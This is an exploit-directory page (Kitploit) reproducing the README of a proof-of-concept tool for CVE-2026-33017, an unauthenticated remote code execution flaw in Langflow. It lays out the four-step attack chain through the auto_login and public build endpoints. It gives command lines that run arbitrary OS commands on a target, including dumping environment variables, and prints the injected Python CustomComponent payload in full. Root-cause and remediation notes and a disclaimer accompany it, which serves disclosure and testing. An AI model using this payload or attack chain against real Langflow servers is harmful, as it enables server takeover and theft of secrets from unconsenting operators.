Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-33017-langflow-rce — Proof-of-concept for CVE-2026-33017, demonstrating unauthenticated remote code execution in vulnerable Langflow versions through malicious CustomComponent code injection. | Kitploit
Herramientas/GitHubGitHub/arensballiu/cve-2026-33017-langflow-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolPayload Development
GitHubarensballiu/cve-2026-33017-langflow-rce

CVE-2026-33017-langflow-rce

Proof-of-concept for CVE-2026-33017, demonstrating unauthenticated remote code execution in vulnerable Langflow versions through malicious CustomComponent code injection.

Ver Repositorio
41hace 11 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Contenido no disponible en el idioma solicitado. Mostrando versión en inglés.

CVE-2026-33017 - Langflow Unauthenticated Remote Code Execution (RCE)

Overview

CVE ID: CVE-2026-33017
Affected Software: Langflow Vulnerable Versions: <= 1.8.2 Fixed Version: >= 1.9.0 Severity: Critical
Author: arensballiu
Date: 2026

Description

Langflow exposes a public flow build endpoint (/api/v1/build_public_tmp/{flowID}/flow) that accepts arbitrary CustomComponent code blocks and executes them server-side without authentication. By injecting a malicious Python payload into the code field of a CustomComponent node, an unauthenticated attacker can run arbitrary operating system commands with the privileges of the Langflow server process.

The attack chain first abuses the /api/v1/auto_login endpoint, which issues a bearer token without requiring credentials when Langflow is running in its default auto-login configuration. Then it uses that token to create a temporary public flow and trigger server-side code execution through the build endpoint.

A docker file is included which creates a docker instance with langflow installed and running.

Affected Endpoints

EndpointMethodAuth RequiredPurpose
/api/v1/auto_loginGETNoObtain bearer token (auto-login must be enabled)
/api/v1/flows/POSTYes (Bearer)Create a new flow
/api/v1/build_public_tmp/{flowID}/flowPOSTNo (public)Trigger build - vulnerable execution point
/api/v1/flows/{flowID}DELETEYes (Bearer)Clean up the created flow

Proof of Concept

File: CVE-2026-33017_POC.py

Requirements

  • Python 3.x
  • requests library
  • Network access to a Langflow instance running with auto-login enabled
pip install requests

Usage

python3 CVE-2026-33017_POC.py -u <target_url> -c <command> [-d]

Arguments

FlagLong FormRequiredDescription
-u--urlYesBase URL of the Langflow instance
-c--commandYesOS command to execute on the server
-d--deleteNoDelete the created flow after exploitation

Examples

Verify code execution:

python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "id"

Retrieve server environment variables:

python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "env"

Keep the flow alive after exploitation (skip cleanup):

python3 CVE-2026-33017_POC.py -u http://langflow.example.com -c "whoami" -d

Expected Output

[+] Got token
[+] Created flow with id: <id>
[+] Exploit sent successfully!
[+] Flow deleted successfully!

Payload Breakdown

The exploit injects the following Python snippet into the code field of a CustomComponent node:

from langflow.custom import Component
from langflow.io import Output
_r = __import__('os').system(<command>)
class ExploitComponent(Component):
    display_name = "ExploitComponent"
    outputs = [Output(display_name="Result", name="output", method="run")]
    def run(self):
        return "ok"
  • __import__('os').system(...) - dynamically imports the os module and executes the attacker-supplied shell command on the server.
  • The rest of the class definition is a valid CustomComponent required to satisfy Langflow's component loader without raising a parse error.
  • The flow is created as PUBLIC and the build endpoint is invoked on its public endpoint, meaning no session cookie or authentication token is required to trigger execution.

Root Cause

Langflow's CustomComponent system allows arbitrary Python code to be submitted as part of a flow definition. The /api/v1/build_public_tmp/{flowID}/flow endpoint builds and partially evaluates this code server-side including module-level statements without sandboxing or restricting access to Python built-ins such as __import__.

Attack Chain Summary

1. GET /api/v1/auto_login          →  Obtain Bearer token (no credentials needed)
2. POST /api/v1/flows/             →  Create a PUBLIC flow (Bearer token)
3. POST /api/v1/build_public_tmp/  →  Inject & execute malicious CustomComponent (no auth)
4. DELETE /api/v1/flows/{id}       →  Clean up (optional)

All four steps can be performed by an anonymous attacker against a default Langflow deployment.

Remediation

  • Upgrade Langflow to version 1.9.0 or above.
  • Disable auto-login (LANGFLOW_AUTO_LOGIN=false) in any internet-facing deployment.

Disclaimer

This proof of concept is provided for educational and authorized security research purposes only. Use of this script against systems without explicit written permission is illegal and unethical. The author and contributors assume no liability for misuse.

Descargar herramienta